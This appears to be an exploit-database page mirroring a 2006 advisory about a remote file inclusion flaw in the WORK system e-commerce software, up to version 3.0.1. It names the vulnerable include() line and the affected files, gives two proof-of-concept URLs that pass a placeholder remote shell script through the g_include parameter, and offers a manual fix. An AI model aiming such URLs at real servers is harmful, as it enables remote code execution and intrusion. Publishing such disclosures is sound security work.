header-logo
Suggest Exploit
vendor:
WORK system e-commerce
by:
SlimTim10
7.5
CVSS
HIGH
Remote File Inclusion
94
CWE
Product Name: WORK system e-commerce
Affected Version From: worksystem <= 3.0.1
Affected Version To: worksystem <= 3.0.1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

WORK System E-Commerce (g_include) Remote File Inclusion Vulnerability

Many files (including index.php) use the include() function with a variable that can be altered remotely. Vulnerable Code: include ($g_include."<file>.inc"); Vulnerable Files: 'index.php' (main directory) along with many files in the './administration/module' and './module' directories. Proof of Concept: http://[host]/work/index.php?g_include=[shell_script] http://[host]/work/module/forum/forum.php?g_include=[shell_script]

Mitigation:

The vulnerable files can be manually edited to initialize the $g_include variable.
Source

Exploit-DB raw data:

============================================================================================

WORK System E-Commerce (g_include) Remote File Inclusion Vulnerability

============================================================================================

Product............: WORK system e-commerce
Affected versions..: worksystem <= 3.0.1
Security Risk......: High
Vendor.............: Laurent Van den Reysen (http://worksystem.sourceforge.net/)
Product Link.......: http://prdownloads.sourceforge.net/worksystem/worksystem_3_0_1.zip?download
Discovered by......: SlimTim10


Details:
---------
Many files (including index.php) use the include() function with a variable that can be
altered remotely.

Vulnerable Code:
-----------------
include ($g_include."<file>.inc");

Vulnerable Files:
------------------
'index.php' (main directory) along with many files in the './administration/module' and
'./module' directories.

Proof of Concept:
------------------
http://[host]/work/index.php?g_include=[shell_script]
http://[host]/work/module/forum/forum.php?g_include=[shell_script]

Solution:
----------
No patch has been provided. The vulnerable files can be manually edited to initialize the
$g_include variable.

============================================================================================

Shoutz: Anonymous bro, Magnetosphere, dw0rek, c4p_sl0ck, str0ke!
SlimTim10 <slimtim10[at]gmail[dot]com>

============================================================================================

# milw0rm.com [2006-11-10]